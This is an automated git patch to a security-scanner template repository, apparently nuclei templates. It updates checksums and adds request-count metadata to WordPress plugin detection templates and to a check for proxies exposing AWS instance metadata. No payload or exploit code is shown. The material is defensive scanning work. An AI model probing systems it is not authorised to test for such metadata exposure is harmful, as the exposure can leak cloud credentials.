-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6473,7 +6473,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:97c451fad67e81010d2f54c900ec64ca772d85e3 +templates-checksum.txt:7c0ef8c37eff55f2d0de620cf778fced488ad17a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From eaa714620e29fc39aca1768e68047c1f5d877a51 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 30 Jun 2023 05:10:39 +0000 Subject: [PATCH 198/609] TemplateMan Update [Fri Jun 30 05:10:39 UTC 2023] :robot: --- http/misconfiguration/proxy/metadata-aws.yaml | 6 +++--- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + .../wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + .../wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + .../technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + .../technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-google-fonts.yaml | 1 + .../wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + .../wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../plugins/essential-addons-for-elementor-lite.yaml | 1 + .../wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + .../technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + .../wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + .../wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + .../technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + .../wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../wordpress/plugins/official-facebook-pixel.yaml | 1 + .../wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + .../wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + .../wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + .../technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + .../wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + .../wordpress/plugins/taxonomy-terms-order.yaml | 1 + .../technologies/wordpress/plugins/the-events-calendar.yaml | 1 + .../technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + .../wordpress/plugins/woo-variation-swatches.yaml | 1 + .../woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + .../wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + .../technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + .../wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 203 insertions(+), 3 deletions(-) diff --git a/http/misconfiguration/proxy/metadata-aws.yaml b/http/misconfiguration/proxy/metadata-aws.yaml index 0bc0b6d963..a72f563785 100644 --- a/http/misconfiguration/proxy/metadata-aws.yaml +++ b/http/misconfiguration/proxy/metadata-aws.yaml @@ -19,14 +19,14 @@ info: - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ - https://twitter.com/Random_Robbie/status/1268186743657947137 - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery# + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,proxy,aws,amazon,misconfig,metadata metadata: - max-request: 2 + max-request: 4 + tags: exposure,proxy,aws,amazon,misconfig,metadata http: - raw: diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml 